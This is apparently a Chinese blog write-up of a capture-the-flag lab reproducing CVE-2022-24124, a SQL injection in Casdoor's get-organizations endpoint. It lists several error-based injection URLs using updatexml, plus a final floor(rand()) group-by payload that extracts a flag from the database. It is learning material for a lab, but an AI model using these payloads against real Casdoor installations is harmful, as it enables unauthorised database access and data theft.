• 【春秋云境】CVE-2022-24124复现

    在这里插入图片描述

    一直不明白updatexml到底要怎么注入
    &field=updatexml(0,concat(0x7e,(version()),0x7e),0)
    确实可以出来版本号
    在这里插入图片描述
    但是如果换成database()还是不行
    在这里插入图片描述
    后面我尝试了now()
    也可以匹配出时间来

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=(updatexml(1,concat(0x7e,(select version()),0x7e),1)) and name

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))%20%20and%20name

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,concat(‘~’,(select group_concat(table_name) from information_schema.tables where table_schema=casdoor),‘~’),1)

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(0,concat(0x7e,(version()),0x7e),0)

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(0,concat(0x7e,(now()),0x7e),0)

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(0,concat(0x7e,(rand()),0x7e),0)

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(0,concat(0x7e,(database()),0x7e),0)

    我尝试了以上几个方案,基本都是报错XPATH queries
    所以有没有人告诉一下为啥updatexml不行
    后面
    最后还是靠了大佬

    https://blog.csdn.net/giaogiaogioao/article/details/128053328#comments_24414057

    http://eci-2ze625l338u3rfrh3r36.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=(select 1 from (select count(*), concat((select concat(',',id,flag) from casdoor.flag limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    • 1
  • 相关阅读:
    虚拟人铺路数字产业未来
    大模型的无限上下文与数据集组合艺术
    企业内部培训直播能做什么
    MySQL之JDBC及常见错误
    书生·浦语大模型全链路开源体系-笔记&作业4
    14.最长公共前缀
    【力扣:1504】统计全1子矩阵
    Easily Compare and Deploy SQL Database Changes
    docker 网络模式 与 ftp 主动模式与被动模式
    JVM监控及诊断工具-GUI篇
  • 原文地址:https://blog.csdn.net/weixin_45275983/article/details/128137915